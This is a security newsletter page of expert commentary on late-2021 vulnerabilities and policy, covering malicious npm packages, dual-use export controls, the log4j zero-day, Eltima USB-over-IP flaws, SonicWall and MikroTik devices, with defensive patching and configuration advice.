Risk of Malicious NPM Packages Increases; US to Look at Export Controls as Means to Limit Malicious Use of “Dual Use Technology”; Apache log4j Zero Day Flaw Requires Immediate Workaround and Log Checking

In the 2021 SANS New Threats and Attacks report, Ed Skoudis highlighted “dependency confusion” attacks as part of the overall software supply chain security issue. Like everything related to supply chain security, there are multiple areas that must be addressed – package manager configuration, software asset inventory, file integrity management, in addition to nascent efforts are having accurate and meaningful Software Bills of Material.

John Pescatore

NPM is not the only repository being hit with malicious package versions, the PyPi (Python) and RubyGems (Ruby) repositories have also been hit. Make sure that your CI process includes only including vetted versions of packages, then check to make sure none of your vetted versions are listed as compromised.

Lee Neely

Current expectations are that this will be some sort of “non-binding code of conduct” so not yet worth a lot of angst about the unintended negative consequences of export controls on “dual use technologies” related to security. But (skewing old here) in 1995, the SATAN vulnerability scanning tool built by Dan Farmer and Wietse Venema was decried as being something bad guys would use to find vulnerabilities that would lead to them attack good guys. Over time (along with other examples such as encryption and pen test tools) experience has shown that making it easier for better security tools to be in the hands of skilled defenders is more effective than making it harder for anyone (including bad guys) to obtain/use such tools.

John Pescatore

Restricting the use of technology intended to violate human rights is a good thing. This initiative should align us with similar restrictions in the UK and elsewhere. Great caution must be exercised with restrictions on dual-use technology. Regulation can rapidly make cyber research as illegal as malicious exploitation.

Lee Neely

The importance of this vulnerability cannot be overstated. Past log4j vulnerability have been actively exploited for years, and vendors like Oracle continue to patch these past vulnerabilities in their products. Luckily there is a configuration workaround that you may consider to mitigate this vulnerability. Do so now as the exploit is trivial and has been made public.

Johannes Ullrich

This is a case for continuous in-house pentesting for organizations large enough to support it. Apache Log4j is one of those web application plumbing components that many companies won't know they're using - much like Apache Struts 2. In fact, if you're running Struts 2, you're likely running a vulnerable version of Log4j. Further, much like Struts vulnerabilities, it's the kind of flaw that generally needs to be checked actively and won't come up in typical vulnerability scans.

Christopher Elgee

Beyond mandatory reporting voluntary reporting is still an option and will help the CISA tune their response efforts. Regardless of reporting, working with the CISA and your sector ISAC will give you access to peers, best practices, assessments and incident response help and expertise.

Lee Neely

NIST is expected to issue guidance on software security best practices in early February, 270 days after EO 14028 was issued, seize the opportunity to provide real-world input into this guidance. NIST will also be operating pilot programs, based on this guidance, which report out in May.

Lee Neely

Three paragraphs in, this article has a line that starts with “While the agency has been studying the topic (for) years, …” and I stopped reading there.

John Pescatore

The reports seem to suggest that NIST is focused on "advice to small business," the segment least well equipped to do anything to address malicious code shipped to them by suppliers. We must hold suppliers accountable for malicious code that they ship.

William Hugh Murray

This vulnerability affects products like Amazon Workspaces that offer "Desktops in the Cloud." To connect USB devices like cameras to these cloud systems, the Eltima SDK provides USB access over IP networks. The advisory lists some of the vulnerable products, but there are likely more.

Johannes Ullrich

Amazon released updates in July, while other cloud providers released updates in September and October. Make sure your cloud provider has implemented the updated USB over Ethernet drivers, if they are using Eltima’s packages. The update requires client and service changes, read your cloud service provider’s guidance. AWS AutoStop WorkSpaces with maintenance turned on, or AlwaysOn WorkSpaces with OS updates turned on will be updated, otherwise manual steps are needed. Scan to make sure the desktop clients are running the latest versions.

Lee Neely

There are no mitigations to this one, you need to update the firmware. Note this is the SMA 100 series – which includes the SMA 200, 201, 400, 410 and 500v appliances. As these appliances are providing firewall and remote access (boundary protection) services, prioritize updating them, particularly as remote access vulnerabilities have been a focus for threat actors.

Lee Neely

Exploits include an unauthenticated remote attacker being able to leverage mod_proxy to forward requests to an arbitrary server. The Cisco advisory lists the vulnerable products, some of which do not yet have fixes. Read the product specific bug advisory for mitigations or workarounds.

Lee Neely

MikroTik routers are very capable and powerful devices, but they lack the management features enterprise equipment has, which makes it difficult to maintain them. Targeting more "Prosumers" and "Enthusiasts", these devices are more capable than the average home/SMB router, but they do show the same weaknesses as the smaller devices. This makes them an interesting target for attackers looking for platforms to build botnets or mine cryptocoins.

Johannes Ullrich

Make sure that you’re changing default credentials, enabled auto-update of firmware, and disabled remote access to the management interface. Also make sure that you’re checking them for vulnerabilities or threats. The Eclypsium report includes links for a free tool which can check this for you.

Lee Neely

Many of these attacks were targeted at small businesses less likely to have a robust security program and leveraged email with malicious attachments. Use caution with attachments, particularly from unknown sources, has to be more than a slogan on a sign or implemented in training, make sure your users internalize it. Most cloud based email services offer security services to screen and/or block malicious attachments and senders, make sure that you’re enabling these services to help reduce the likelihood of a user choosing badly. The cost difference of these services, if any, is far less than recovery from Ransomware or other incident.

Lee Neely